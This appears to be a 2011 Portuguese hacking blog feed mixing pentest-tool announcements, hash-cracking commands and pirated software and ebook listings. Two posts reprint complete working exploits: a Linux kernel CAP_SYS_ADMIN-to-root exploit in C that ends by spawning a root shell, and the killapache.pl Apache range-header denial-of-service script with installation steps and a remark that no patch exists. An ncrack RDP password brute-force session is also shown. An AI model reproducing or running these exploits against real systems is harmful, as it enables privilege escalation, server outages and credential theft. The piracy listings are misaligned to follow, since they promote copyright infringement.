r00tbrazil

Findmyhash - Find Cracked Hashes Online !

noreply@blogger.com (MaUzZz[BR]) — Sat, 15 Oct 2011 18:04:00 -0700

Findmyhash - Find Cracked Hashes Online !

findmyhash é um script Python que foi desenvolvido para encontrar diferentes tipos de hashes de senha usando vários serviços on-line cracking. No caso de não encontrar um ambiente favorável hash "cracked", mas também irá apresentar-lhe, com resultados relevantes do Google.

Este é um script open source pode servem principalmente como um ponto de arranque para quebrar qualquer hash. Ele suporta uma grande quantidade de hash serviços cracking on-line... !

Cracking - Serviços Suportados pelo findmyhash:

Código PHP:

Schwett.com 
Netmd5crack.com 
MD5-Cracker.tk 
tools.BenRamsey.com 
md5.Gromweb.com 
md5.HashCracking.com 
victorov.su 
md5.thekaine.de 
tmto.org 
md5-db.de 
md5.my-addr.com 
md5pass.info 
md5decryption.com 
md5crack.com 
md5online.net 
md5-decrypter.com 
authsecu.com 
hashcrack.com 
objectif-securite.ch 
c0llision.net 
md5.rednoize.com 
cmd5.org 
cacin.net 
ibeast.com 
password-decrypt.com 
bigtrapeze.com 
hashchecker.com 
md5hashcracker.appspot.com 
passcracking.com 
askcheck.com 
cracker.fox21.at 
crackfoo.nicenamecrew.com 
joomlaaa.com 
md5-lookup.com 
sha1-lookup.com 
sha-256.sha1-lookup.com 
ripemd-lookup.com 
md5.com.cn 
md5.digitalsun.pl 
md5.drasen.net 
md5.myinfosec.net 
md5.net 
md5.noisette.ch 
md5hood.com 
stringfunction.com 
xanadrel.99k.org 
isc.sans.edu 
bokehman.com

Algorítimos Suportados:

Código PHP:

MD4 - RFC 1320 
MD5 - RFC 1321 
SHA1 - RFC 3174 (FIPS 180-3) SHA224 - RFC 3874 (FIPS 180-3) SHA256 - FIPS 180-3 
SHA384 - FIPS 180-3 
SHA512 - FIPS 180-3 
RMD160 - RFC 2857 
GOST - RFC 5831 
WHIRLPOOL - ISO/IEC 10118-3:2004 
LM - Microsoft Windows hash 
NTLM - Microsoft Windows hash 
MYSQL - MySQL 3, 4, 5 hash 
CISCO7 - Cisco IOS type 7 encrypted passwords 
JUNIPER - Juniper Networks $9$ encrypted passwords 
LDAP_MD5 - MD5 Base64 encoded 
LDAP_SHA1 - SHA1 Base64 encoded

Exemplo de Como Usar:

Cracking MD5:
python findmyhash.py MD5 -h "098f6bcd4621d373cade4e832627b4f6"

Cracking SHA1:
python findmyhash.py SHA1 -h "A94A8FE5CCB19BA61C4C0873D391E987982FBBD3" -g

Código PHP:

http://code.google.com/p/findmyhash/downloads/list

Hash Code Cracker V 1.2 Released

noreply@blogger.com (MaUzZz[BR]) — Sat, 15 Oct 2011 17:59:00 -0700

BreakTheSecurity acaba de lançar a versão Cracker Hash Código 1.2. Nossa última versão suporta a função Cracking Online.:

Descrição:
Este Hash Crack é desenvolvido para PenTesters e hackers éticos. Utilize este software para fins legais : (Brute Force Pass - Teste da Força da senha).

Características:
Este software vai quebrar o MD5, SHA1, NTLM (Windows Password) códigos de hash. Não é necessário instalar. Suporta todas as plataformas (windows XP / 7, Linux,..).

V1.2 Changelog:
Included Online cracking Support
Project HomePage:Ethical Hacking Projects of Break The Security-Open Source Softwares

Segredos do Google

noreply@blogger.com (MaUzZz[BR]) — Sat, 15 Oct 2011 17:53:00 -0700

Nº de páginas: 18/Tamanho: 2 MB/Formato: pdf

Segredos do Google: Desvende os Recursos não Revelados do Poderoso.

Desvende os recursos não revelados do poderoso sistema de busca. Aprenda neste livro, como explorar todo o potencial e as peculiaridades desse poderoso mecanismo de busca. Esta obra foi escrita para quem quer conhecer os recursos do Google e também para aqueles que pretendem fazer o papel de investigador pela infovia e desvendar a vida de uma pessoa ou empresa na Web.

Diário Hacker Confissões de Hackers Adolescentes

noreply@blogger.com (MaUzZz[BR]) — Sat, 15 Oct 2011 17:38:00 -0700

Descrição: Mais do que apenas uma série de histórias sobre os aspectos técnicos de inúmeras proezas, o livro tenta analisar o motivo pelo qual esses adolescentes têm se envolvido em ações hackers. Os leitores descobrirão como os hackers pensam e agem, e também os aspectos internos e externos que os guiaram – e ainda os guiam – para o submundo hacker, e, uma vez nesse submundo, o que encontraram.

Informações:
Tamanho: 89 Mb
Formato: Rar

DriverPack Solution Laptop e Desktop

noreply@blogger.com (MaUzZz[BR]) — Sat, 15 Oct 2011 17:25:00 -0700

DriverPack Solution Laptop & Desk (Updated August 2011) | 2.84 GB

Super pacote com drivers atualizados para as suas últimas versões.

O pacote inclui os principais drivers de todos os tipos de periféricos compatíveis com Windows xp, Vista, Seven e Server.

Platinum Hide IP 3.1.2.2

noreply@blogger.com (MaUzZz[BR]) — Sat, 15 Oct 2011 17:15:00 -0700

Preocupado com privacidade na Internet? Gostaria de ocultar seu endereço IP? Platinum Hide IP é o software que você procurava. Ele encontra um servidor proxy disponível e o configura automaticamente. Não há mais para se preocupar. Platinum Hide IP procura por servidores anônimos e torna seu computador invisível para os websites que você surfa. Proteja-se de qualquer website que queira monitorá-lo e acessar informações através do seu endereço IP. Evite que informações pessoais sejam usadas para enviar spam e e-mails marketeiros para você ou outros usuários da Internet.

Adobe After Effects CS 5.5 + With Plugins Tempalte Fonts Effects)

noreply@blogger.com (MaUzZz[BR]) — Sat, 15 Oct 2011 17:07:00 -0700

Adobe After Effects CS 5.5 + With Plugins Tempalte Fonts Effects

Adobe After Effects CS5.5 – Uma nova versão do software para criar gráficos com movimento e efeitos visuais de acordo com os padrões da indústria. Independentemente do âmbito de sua atividade profissional, seja TV, filmes ou vídeos de design para dispositivos móveis ea Internet, o programa Adobe After Effects CS5 lhe permitirá criar gráficos em movimento e efeitos visuais deslumbrantes ao nível do blockbuster moderno.

Novos recursos e efeitos:

Adicionado um novo efeito de estabilização de imagem: Estabilizador Warp, que funciona automaticamente. Configurações adicionado para reduzir a “geléia” da câmera, mais leitura sobre este efeito aqui.
- Melhoria impacto Desfoque de Lente da câmera. Criar imagens de desfocagem com borrão lente da câmera. Instalar as características da forma um arco-íris os cantos e as bandas de difração para criar um bokeh atraente, e usar os mesmos recursos para o controle impressionante sobre a profundidade de campo utilizando as configurações da câmera 3D After Effects.
- Melhorado o efeito de Timecode. – Suporte para a leitura eo uso de Timecode (incluindo QuickTime e seqüências DPX).
- Melhorado o efeito de óculos 3D. Suporte para trabalhar com vídeo 3D estéreo, graças a opção Criar Rig Stereo.
- Melhor desempenho de programas, incluindo o Chile a partir do cache de disco reciclado (que agora é ativado por padrão). Ajusta automaticamente o tamanho: Tamanho máximo de cache de disco – 20Gbayt. Cache Layer – Caching permite que você visualize tiros para cada camada. Opção Cache camada podem ser selecionados diretamente no Timeline. Tiros verde – o vídeo é armazenado em cache na memória, azul – são armazenados em cache no disco.
- Adicionado melhorias nas luzes e câmeras 3D. Na definição das fontes de luz adicionados itens: Falloff, Radius Distância Falloff,. Parâmetro Falloff especifica o efeito de diminuição da intensidade de luz, dependendo da distância.
- Melhor trabalho com fontes RAW, incluindo mas não limitado CinemaDNG importações. Para gerenciamento de cores R3D acrescentou novas (REDcolor2, REDgamma2, REDlogFilm, etc), as curvas de melhor, e uma interface de usuário atualizado.
- Melhorou e ampliou a trabalhar com look-up table (LUT). Apoio adicional para a tabela de codificação em cores. Use uma ampla variedade de tabelas, a codificação de cor no After Effects, por exemplo, formatos e CUBE 3DL, assim como a cor 1D tabela de codificação.

Saída de vídeo XDCAM EX e XDCAM HD como MXF OP1a.
- Compatibilidade com o projecto After Effects CS5, ou seja, projeto CS5.5 podem ser salvos como CS5.
Agora, não só como antes, você pode arrastar o projeto After Effects CS5.5 na fila de processamento de mídia Encoder CS5.5, mas uma oportunidade de ganhar a pista em linha reta do Projeto paleta.
É importante notar que alguns dias antes do lançamento do Adobe After Effects CS5.5, o programa tem tido tempo para atualizar com: multilingual atualização Adobe After Effects CS5 10.0.2 Atualização

Formato: RAR

Tamanho: 9.33 Gb

Curso Completo MySQL – MJailton – PT-BR

noreply@blogger.com (MaUzZz[BR]) — Sat, 15 Oct 2011 16:56:00 -0700

CONTEÚDO DO CURSO:

Neste curso você aprenderá os princípios de Banco de Dados. O curso tem duração de aproximadamente 12 horas de aula, sendo que o mesmo está dividido em duas principais partes, sendo elas: Modelagem de Dados e Linguagem SQL, um curso feito para pessoas que não têm nenhum conhecimento em banco de dados e também para aqueles que querem enriquecer ainda mais o seu conhecimento. Você com certeza terá em suas mãos um curso que realmente vai ensinar você aquilo que você precisa saber sobre Banco de dados, sobre SQL e sobre o MySQL.

Conteúdo resumido do curso:

01 – Introdução
02 – Instalando o MySql
03 – Instalando o MySql Front
04 – Conceitos de Banco de Dados
05 – Tipos de Dados Numéricos
06 – Tipos de Dados Data Hora
07 – Tipos de Dados String

Mini curso de modelagem

08 – Conceituando modelagem de dados
09 – Modelo Conceitual
10 – Modelo Lógico
11 – Modelo Físico
12 – Modelo Entidade Relacionamento
13 – Entidade
14 – Atributos
15 – Exemplo 1 – Clínica
16 – Relacionamentos
17 – Cardinalidade de relaciomentos
18 – Relacionamento Um-Para-Um
19 – Relacionamentos Um-Para-Muitos
20 – Relacionamento Muitos-Para-Muitos
21 – Exemplo 1 – Loja de Roupas
22 – Exemplo 2 – Agência Bancária
23 – Relacionamentos especiais
24 – Relacionamento Ternário
25 – Exemplo Geral
26 – Normalização na prática

27 – Conhecendo o MySQL Front
28 – Instalando o Apache
29 – Instalando e configurando o PHP
30 – Configurando o Apache
31 – Conhecendo a estrutura do Banco de Dados Pedidos
32 – Construindo o Banco de dados Pedidos
33 – Conhecendo a Cláusula SELECT e WHERE
34 – Operadores de comparação
35 – Operadores Lógicos
36 – Estudando as funções Strings (Ascii(), char(), concat(), concat_ws(), Field(),elt(), inStr(), insert(), lcase(), lower(), left(), locate(), ltrim(), ord(), length(), repeat(), replace(), Right(), rpad(), lpad(), space(), substing(), upper,
37 – Estudando as funções matemáticas (abs(), sign(), mod(), floor(), ceil(), ceiling(), round(), div, Power(), pow(), sqrt(), PI(), cos(), Sin(), tan(), arccos(), arctan(), arcsin(), cot(), log(), rand(), truncate(),
38 – Estudando as funções data hora: date_format(), curdate, current_date, curtime, currentime, sec_to_time(), time_to_sec(), date(), time(), timestamp(), dayofweek(), weekday(), dayofMonth(), day(), year(), month(), dayname(), montname(), hour(), weekofyear(), minute(),
39 – Estudo do Select
49 – Funçoes agregados
50 – Join
51 – Insert, Update, delete
52 – Limit e Union
53 – Vários exercícios com SQL complexa

Parte 1 = http://www.wupload.com.br/file/325316060

Parte 2 = http://www.wupload.com.br/file/325318371

BestCrypt 8.23.4

noreply@blogger.com (MaUzZz[BR]) — Sat, 15 Oct 2011 16:33:00 -0700

Jetico BestCrypt 8.23.4 | 15.84 MB

O BestCrypt é um programa de uso fácil, com uma poderosa tecnologia de criptografia de informações. Você pode alocar um pedaço de espaço livre do seu disco rígido onde todos os seus dados mais secretos são armazenados em forma criptografada.

O Fascinante Império de Steve Jobs

noreply@blogger.com (MaUzZz[BR]) — Sat, 15 Oct 2011 16:28:00 -0700

O Fascinante Império de Steve Jobs - 139MB

“O Fascinante Império de Steve Jobs” é o livro definitivo sobre a Apple: um retrato fascinante sobre as brigas e intrigas que rodeiam a criação de qualquer grande empresa. O autor oferece suas perspectivas contemporâneas sobre as realizações de Jobs e seu retorno à Apple, neste livro que se tornou um clássico.

No início dos anos 1980, o autor, era um jovem jornalista da revista Time, e obteve acesso irrestrito aos bastidores da Apple Computer, uma até então, conhecida empresa de tecnologia de ponta. Sua tarefa era realizar uma crônica sobre a primeira década da Apple. O resultado está neste livro e leva os leitores à infância de Steve Jobs e Stephen Wozniak e mostra como eles saíram do colégio e fundaram a Apple, em 1976. De um hobbie de garagem para a Fortune 500. “O Fascinante Império de Steve Jobs” é o livro definitivo sobre a Apple, um retrato fascinante sobre as brigas e intrigas que rodeiam a criação de qualquer grande empresa. O autor oferece suas perspectivas contemporâneas sobre as realizações de Jobs e seu retorno à Apple.

Siga os passos de Steve Jobs na ocasião da sua demissão sem cerimônias da Apple, sua longa luta para erguer a empresa de computadores NeXT e a aquisição do então obscuro estúdio Pixar, em 1986. Finalmente saiba como Jobs reemergiu na Apple no final dos anos 1990 e trouxe novos ares para uma empresa em decadência que foi transformada em objeto de desejo para todos. Leitura obrigatória para empreendedores, executivos, profissionais de administração que pretendem conhecer o modelo de gestão da empresa e a formação da personalidade do CEO que
mudou o mundo dos negócios, duas vezes.

Alien Skin Master Bundle (2011)

noreply@blogger.com (MaUzZz[BR]) — Sat, 15 Oct 2011 16:20:00 -0700

Alien Skin Bundle Master (2011)Photoshop Plugins Collection (x86/x64) | 570,8 MB

Eye Candy 6.1.1 [build 1058] (x86 e x64)Eye Candy 6 é um conjunto de 30 filtros de Photoshop que elegantemente lidar com uma ampla gama de tarefas de design, mancha de interfaces Web para logos de bom gosto para títulos espectacular. Simulação realista de fenômenos naturais dá resultados muito bem detalhados. Interface simples Eye Candy torna-o fácil, poupando-lhe um monte de tempo em Photoshop.Efeitos agora adaptar ao seu tamanho atual da imagem, para fazer o ajuste menos slider. Mais de 1500 presets cuidadosamente projetados são organizados em categorias para uma navegação rápida.

Sql Poizon v1.1 - sqli Exploit Scanner Tool

noreply@blogger.com (MaUzZz[BR]) — Tue, 11 Oct 2011 15:00:00 -0700

2.6.34 & 2.6.34-2 2011 Local Root Exploit

noreply@blogger.com (MaUzZz[BR]) — Tue, 11 Oct 2011 14:48:00 -0700

* Linux Kernel CAP_SYS_ADMIN to root exploit

 * by Dan Rosenberg

 * @djrbliss on twitter

 *

 * Usage:

 * gcc -w caps-to-root.c -o caps-to-root

 * sudo setcap cap_sys_admin+ep caps-to-root

 * ./caps-to-root

 *

 * This exploit is NOT stable:

 *

 *  * It only works on 32-bit x86 machines

 *

 *  * It only works on >= 2.6.34 kernels (it could probably be ported back, but

 *    it involves winning a race condition)

 *

 *  * It requires symbol support for symbols that aren't included by default in

 *    several distributions

 *

 *  * It requires the Phonet protocol, which may not be compiled on some

 *    distributions

 *

 *  * You may experience problems on multi-CPU systems

 *

 * It has been tested on a stock Ubuntu 10.10 installation.  I wouldn't be

 * surprised if it doesn't work on other distributions.

 *

 * ----

 *

 * Lately there's been a lot of talk about how a large subset of Linux

 * capabilities are equivalent to root.  CAP_SYS_ADMIN is a catch-all

 * capability that, among other things, allows mounting filesystems and

 * injecting commands into an administrator's shell - in other words, it

 * trivially allows you to get root.  However, I found another way to get root

 * from CAP_SYS_ADMIN...the hard way.

 *

 * This exploit leverages a signedness error in the Phonet protocol.  By

 * specifying a negative protocol index, I can craft a series of fake

 * structures in userspace and cause the incrementing of an arbitrary kernel

 * address, which I then leverage to execute arbitrary kernel code.

 *

 * Greets to spender, cloud, jono, kees, pipacs, redpig, taviso, twiz, stealth,

 * and bla.

 *

 */

 

#include <stdio.h>

#include <fcntl.h>

#include <sys/socket.h>

#include <errno.h>

#include <string.h>

#include <linux/capability.h>

#include <sys/utsname.h>

#include <sys/mman.h>

#include <unistd.h>

 

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);

typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;

_prepare_kernel_cred prepare_kernel_cred;

 

int getroot(void)

{

         

        commit_creds(prepare_kernel_cred(0));

        return 0;     

 

}

 

int konami(void)

{

 

        /* Konami code! */

        asm("inc %edx;"         /* UP */

            "inc %edx;"         /* UP */

            "dec %edx;"         /* DOWN */

            "dec %edx;"         /* DOWN */

            "shl %edx;"         /* LEFT */

            "shr %edx;"         /* RIGHT */

            "shl %edx;"         /* LEFT */

            "shr %edx;"         /* RIGHT */

            "push %ebx;"        /* B */

            "pop %ebx;"

            "push %eax;"        /* A */

            "pop %eax;"

            "mov $getroot, %ebx;"

            "call *%ebx;");     /* START */

 

        return 0;

}

 

/* thanks spender... */

unsigned long get_kernel_sym(char *name)

{

        FILE *f;

        unsigned long addr;

        char dummy;

        char sname[512];

        struct utsname ver;

        int ret;

        int rep = 0;

        int oldstyle = 0;

 

        f = fopen("/proc/kallsyms", "r");

        if (f == NULL) {

                f = fopen("/proc/ksyms", "r");

                if (f == NULL)

                        return 0;

                oldstyle = 1;

        }

 

        while(ret != EOF) {

                if (!oldstyle)

                        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);

                else {

                        ret = fscanf(f, "%p %s\n", (void **)&addr, sname);

                        if (ret == 2) {

                                char *p;

                                if (strstr(sname, "_O/") || strstr(sname, "_S."))

                                        continue;

                                p = strrchr(sname, '_');

                                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {

                                        p = p - 4;

                                        while (p > (char *)sname && *(p - 1) == '_')

                                                p--;

                                        *p = '\0';

                                }

                        }

                }

                if (ret == 0) {

                        fscanf(f, "%s\n", sname);

                        continue;

                }

                if (!strcmp(name, sname)) {

                        fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr);

                        fclose(f);

                        return addr;

                }

        }

 

        fclose(f);

        return 0;

}

 

int main(int argc, char * argv[])

{

 

        int sock, proto, i, offset = -1;

        unsigned long proto_tab, landing, target, pn_ops, pn_ioctl, *ptr;

        void * map;

         

        /* Create a socket to load the module for symbol support */

        printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n");

        sock = socket(PF_PHONET, SOCK_DGRAM, 0);

 

        if(sock < 0) {

                if(errno == EPERM)

                        printf("[*] You don't have CAP_SYS_ADMIN.\n");

 

                else

                        printf("[*] Failed to open Phonet socket.\n");

                 

                return -1;

        }

 

        /* Resolve kernel symbols */

        printf("[*] Resolving kernel symbols...\n");

 

        proto_tab = get_kernel_sym("proto_tab");

        pn_ops = get_kernel_sym("phonet_dgram_ops");

        pn_ioctl = get_kernel_sym("pn_socket_ioctl");

        commit_creds = get_kernel_sym("commit_creds");

        prepare_kernel_cred = get_kernel_sym("prepare_kernel_cred");

 

        if(!proto_tab || !commit_creds || !prepare_kernel_cred ||

           !pn_ops || !pn_ioctl) {

                printf("[*] Failed to resolve kernel symbols.\n");

                return -1;

        }

 

        /* Thanks bla, for reminding me how to do basic math */

        landing = 0x20000000;

        proto = 1 << 31 | (landing - proto_tab) >> 2;

 

        /* Map it */

        printf("[*] Preparing fake structures...\n");

 

        map = mmap((void *)landing, 0x10000,

                   PROT_READ | PROT_WRITE | PROT_EXEC,

                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

         

        if(map == MAP_FAILED) {

                printf("[*] Failed to map landing area.\n");

                return -1;

        }

         

        /* Pointer to phonet_protocol struct */

        ptr = (unsigned long *)landing;

        ptr[0] = &ptr[1];

 

        /* phonet_protocol struct */

        for(i = 1; i < 4; i++)

                ptr[i] = &ptr[4];

 

        /* proto struct */

        for(i = 4; i < 204; i++)

                ptr[i] = &ptr[204];

 

        /* First, do a test run to calculate any offsets */

        target = 0x30000000;

 

        /* module struct */

        for(i = 204; i < 404; i++)

                ptr[i] = target;

         

        /* Map it */

        map = mmap((void *)0x30000000, 0x2000000,

                   PROT_READ | PROT_WRITE | PROT_EXEC,

                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

         

        if(map == MAP_FAILED) {

                printf("[*] Failed to map landing area.\n");

                return -1;

        }

 

        printf("[*] Calculating offsets...\n");

 

        socket(PF_PHONET, SOCK_DGRAM, proto);

         

        ptr = 0x30000000;

        for(i = 0; i < 0x800000; i++) {

                if(ptr[i] != 0) {

                        offset = i * sizeof(void *);

                        break;

                }

        }

 

        if(offset == -1) {

                printf("[*] Test run failed.\n");

                return -1;

        }

 

        /* MSB of pn_ioctl */

        target = pn_ops + 10 * sizeof(void *) - 1 - offset;

         

        /* Re-fill the module struct */

        ptr = (unsigned long *)landing;

        for(i = 204; i < 404; i++)

                ptr[i] = target;

         

        /* Push pn_ioctl fptr into userspace */

        printf("[*] Modifying function pointer...\n");

 

        landing = pn_ioctl;   

        while((landing & 0xff000000) != 0x10000000) {

                socket(PF_PHONET, SOCK_DGRAM, proto);

                landing += 0x01000000;

        }

 

        /* Map it */

        map = mmap((void *)(landing & ~0xfff), 0x10000,

                   PROT_READ | PROT_WRITE | PROT_EXEC,

                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

         

        if(map == MAP_FAILED) {

                printf("[*] Failed to map payload area.\n");

                return -1;

        }

 

        /* Copy payload */

        memcpy((void *)landing, &konami, 1024);

 

        printf("[*] Executing Konami code at ring0...\n");

        ioctl(sock, 0, NULL);

 

        if(getuid()) {

                printf("[*] Exploit failed to get root.\n");

                return -1;

        }

 

        printf("[*] Konami code worked!  Have a root shell.\n");

        execl("/bin/sh", "/bin/sh", NULL);

 

}

Inguma v.0.4 Released

noreply@blogger.com (MaUzZz[BR]) — Sat, 17 Sep 2011 21:01:00 -0700

Inguma é um kit de ferramentas de teste de penetração inteiramente escrito em python. O quadro inclui módulos para descobrir hosts, recolher informações sobre, metas fuzz, nomes de usuário e senhas de força bruta e, claro, exploits.

Novos recursos adicionados:

-A interface gráfica foi modificado e limpa, a fim de dar mais espaço para as áreas mais ativas, como o mapa da rede, a interface de RCE ou as façanhas / áreas de difusão.
-Última aberto / KB salvo agora são facilmente acessíveis na barra de ferramentas.
-A barra de status inferior ganhou mais funcionalidade que mostra informações sobre KB em uso e as metas ou vulnerabilidades descobertas.
-A guia fuzzing novo foi acrescentado ao espaço de trabalho com dois Exploits fuzzers diferentes: Krash e scapy
-Krash difusor foi parte do projeto Inguma por um tempo mas agora ele pode ser usado diretamente a partir do GUI. Basta selecionar o alvo, o pacote a ser fuzzed e começar a pressionar. Leia mais sobre difusor Krash aqui.
-O difusor scapy é um invólucro GUI para a função scapy de fuzz que faz da rede de difusão muito fácil. Está cheio de arrastar e soltar-driven e, para começar, você só tem que compor um pacote, largando camadas, selecione as camadas / campos a serem fuzzed e selecione um diretório de saída para salvar os pacotes enviados e recebidos.
..... e muito mais

D.o.S em Apache + Exploit

noreply@blogger.com (MaUzZz[BR]) — Sun, 11 Sep 2011 08:04:00 -0700

Ha alguns Dias foi publicado um exploit (em 19 de Agosto) que permite a causar uma negação de serviço em todas as versões do Apache. Isto significa que você pode prestar serviço para o servidor web Apache com as configurações padrão.
Da vulnerabilidade de negação de serviço em Apache foi descoberto pelo "Kingcope".
A declaração de uma série de bytes permite ao navegador para carregar apenas algumas partes de um documento, por exemplo 500-1000 bytes. Este método é usado por programas como clientes de download para retomar downloads que foram interrompidos, e é projetado para reduzir os requisitos de largura de banda. No entanto, parece lançar múltiplos componentes não classificados no cabeçalho pode causar um mau funcionamento do servidor Apache.
No caso de explorá-lo envia um cabeçalho de intervalo para o servidor, que irá indicar várias partes, bytes de tamanho, que são necessários do site. Isso é feito usando pedidos HEAD para o servidor, adicionando o seguinte cabeçalho: "Faixa:. Bytes = 5-1,5-2,5-3,5-4, ... ,5-1299" A chave é que cada parte é solicitada gzip (Accept-Encoding: gzip), levando ao consumo excessivo de servidores, principalmente CPU e memória RAM, o que provoca uma negação de serviço no ambiente.

Killapache.pl

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
	print "Apache Remote Denial of Service (memory exhaustion)\n";
	print "by Kingcope\n";
	print "usage: perl killapache.pl <host> [numforks]\n";
	print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
	
$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
	$p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next; 	
	
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                     			 Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                     			 Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
	print "host seems vuln\n";
	return 1;	
} else {
	return 0;	
}
}

if ($#ARGV < 0) {
	usage;
	exit;	
}

if ($#ARGV > 1) {
	$numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
	print "Host does not seem vulnerable\n";
	exit;	
}
while(1) {
killapache();
}

O Exploit No Linux ! 

Para rodar o Exploit em Ubuntu ou Back-Track necessita instalar as livrarias Parallel::ForkManager:

sudo apt-get install libparallel-forkmanager-perl

 

O Exploit no Windows !

1º No Windows, você deve ter o Perl instalado (eu tenho o ActivePerl 1204) e faça o seguinte:

Entre o diretório onde foi instalado o perl, procure no arquivo bin shell.bat ppm (duplo clique) 

irá abrir uma ppm console.

C:\Perl64\bin\ppm-shell.bat

 
2° No painel cmd acrescentar estes 2 comandos, ai devera funcionar perfeitamente. 

rep add Apache http://www.apache.org/dis/perl/win32-bin/ppms/
install Parallel::ForkManager 

 

O impacto da vulnerabilidade é grave, porque afeta todas as versões do apache e não há nenhum patch oficial ainda !

ncrack Remote Desktop Brute Force

noreply@blogger.com (MaUzZz[BR]) — Sun, 11 Sep 2011 07:18:00 -0700

Ncrack é uma rede de alta velocidade ferramenta de craqueamento de autenticação. Foi construído para ajudar as empresas a proteger suas redes de forma proativa testar todos os seus hosts e dispositivos de rede para senhas pobres. Profissionais de segurança também contam com Ncrack quando a auditoria de seus clientes. Ncrack foi projetado usando uma abordagem modular, uma sintaxe de linha de comando semelhante ao Nmap e um motor dinâmico que pode adaptar o seu comportamento com base no feedback da rede. Ela permite a rápida e confiável de auditoria em grande escala de vários hosts.

Ncrack características incluem uma interface muito flexível que concede o controle total do usuário das operações de rede, permitindo muito sofisticados ataques bruteforcing, modelos de tempo para facilidade de uso, tempo de execução de interação semelhante ao Nmap e muitos mais.

Como Usar:
ncrack -vv -d7 --user user name ip Address Time Out and The last Word list

test in Linux: Log :::

user@ubuntu:~/pentest/ncrack$ ncrack -vv -d7 --user administrator 192.168.1.100:3389,CL=10
Fetchfile found /usr/local/share/ncrack/default.pwd
Starting Ncrack 0.3ALPHA ( http://ncrack.org ) at 2011-02-09 15:28 PST
rdp://192.168.1.100:3389 (EID 1) Login failed: 'administrator' '123456'
rdp://192.168.1.100:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.96
...
rdp://192.168.1.100:3389 (EID 1518) Login failed: 'administrator' 'pitbull'
rdp://192.168.1.100:3389 (EID 1518) Attempts: total 1519 completed 1513 supported 1 --- rate 3.10
rdp://192.168.1.100:3389 (EID 1520) Login failed: 'administrator' 'geraldine'
rdp://192.168.1.100:3389 (EID 1520) Attempts: total 1520 completed 1514 supported 1 --- rate 3.17
rdp://192.168.1.100:3389 (EID 1522) Login failed: 'administrator' 'allstar'
rdp://192.168.1.100:3389 last: 0.00 current 0.00 parallelism 10
rdp://192.168.1.100:3389 Increasing connection limit to: 10
rdp://192.168.1.100:3389 (EID 1522) Attempts: total 1521 completed 1515 supported 1 --- rate 3.00
...
Keep in mind that against XP you can only have one connection at a time so you'll have to set your Connection Limit value to 1 (CL=1)

To Download it For Linux and Windows :

OWASP Zed Attack Proxy v.1.3.2 Released

noreply@blogger.com (MaUzZz[BR]) — Wed, 7 Sep 2011 17:33:00 -0700

The OWASP Zed Attack Proxy (ZAP) é uma ferramenta fácil de usar testes integrados de penetração para encontrar vulnerabilidades em web applications. é projetado para ser usado por pessoas com uma vasta gama de experiência de segurança e, como tal, é ideal para desenvolvedores e testadores funcionais que são novos para testes de penetração, além de ser uma adição útil para um experiente pentest.

Algumas das características da ZAP:
interceptando Proxy
scanner automatizado
scanner passivo
Scanner Brute Force
aranha
difusor
porta de scanner
Dinâmica certificados SSL
API
integração Beanshell

Site Projeto: OWASP Zed Attack

XCode SQLi/LFI/XSS and Webshell Scanning Tool

noreply@blogger.com (MaUzZz[BR]) — Wed, 7 Sep 2011 17:26:00 -0700

Video Demo:

Vulnerability Master 1.0 Released

noreply@blogger.com (MaUzZz[BR]) — Wed, 7 Sep 2011 17:20:00 -0700

Video Demo:

Albaloo Web vulnerability Scanner 1.3

noreply@blogger.com (MaUzZz[BR]) — Tue, 30 Aug 2011 18:04:00 -0700

Propriedades da versao:

Auto Scan
multi thread
Ability to use multiple proxy
Include and exclude settings for crawler and scanner
Ability to review cases duplicate Links
Collect email address
Detect:
SQL Injection
Cross Site Scripting
Local File Inclusion
Remote File Inclusion
Path Traversal & local file disclosure
Source Code Disclosure
Application Error
Directory Indexing
Full Path Disclosure

INSECT Pro v.2.7

noreply@blogger.com (MaUzZz[BR]) — Tue, 30 Aug 2011 18:00:00 -0700

O Insect Pro é um software de auditoria e testes de invasão para Windows voltado para permitir que organizações monitorem e gerenciem as últimas ameaças e implementem políticas ativas de segurança, através da análise da sua infraestrutura e suas aplicações por testes de invasão.

A nova versão acompanha a última atualização do metasploit e conta com as seguintes melhorias:

* Minimizar para a área de notificação para funcionar em background
* Função de keylogging
* Melhorias na interface de usuário
* Controle através de linha de comando
* Captura de screenshots
* Gravação de vídeo

# Otima Ferramenta, Para quem Gosta de Pentest - Analize de Segurança, E para quem gosta de Metasploit, essa Ferramenta e um otimo Complemento Para seus Estudos... !

VIDEOS DEMO:
http://www.youtube.com/user/InsecurityResearch

